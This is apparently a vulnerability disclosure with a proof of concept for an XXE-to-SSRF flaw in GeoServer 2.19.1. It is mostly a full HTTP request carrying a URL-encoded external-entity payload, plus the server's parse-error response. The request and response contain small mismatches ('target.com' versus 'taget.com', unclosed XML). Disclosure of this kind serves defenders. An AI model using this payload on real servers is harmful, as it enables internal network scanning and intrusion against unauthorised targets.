The WPS component of the GeoServer version 2.19.1 is vulnerable to an XXE, an attacker can send crafted XML files with arbitrary locations in the Filter parameter. This XXE is limited since only links pointing to an XSD file are allowed while using a DTD file was not permitted. However, this issue can still be exploited to perform SSRF attacks by scanning the local network for available hosts and open ports.
PoC:
HTTP Request:
POST /geoserver-geotec/wfs HTTP/1.1
Host: Example.com
Content-Length: 289
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Connection: close
request=GetFeature&SERVICE=WFS&VERSION=1.0.0&TYPENAME=@candidateFeature@&FILTER=<%3fxml+version%3d"1.0"+encoding%3d"ISO-8859-1"%3f>+<!DOCTYPE+foo+[+<!ENTITY+xxe+SYSTEM+"http://target.com/test.xsd"+>]><Filter+><PropertyIsEqualTo><PropertyName>%26xxe%3b<Literal>Brussels</Literal></Filter>
HTTP Response:
HTTP/1.1 200 OK
Date: Mon, 20 Feb 2023 16:01:07 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 692
Connection: close
[...SNIP...]
Permissions-Policy: self
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
<?xml version="1.0" ?>
<ServiceExceptionReport
version="1.2.0"
xmlns="http://www.opengis.net/ogc"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.opengis.net/ogc http://schemas.opengis.net/wfs/1.0.0/OGC-exception.xsd">
<ServiceException code="XML getFeature request SAX parsing error" locator="org.geoserver.ows.XmlRequestReader">
org.xml.sax.SAXParseException; systemId: http://taget.com/test.xsd; lineNumber: 1; columnNumber: 3; The content of elements must consist of well-formed character data or markup.
The content of elements must consist of well-formed character data or markup.
</ServiceException></ServiceExceptionReport>
|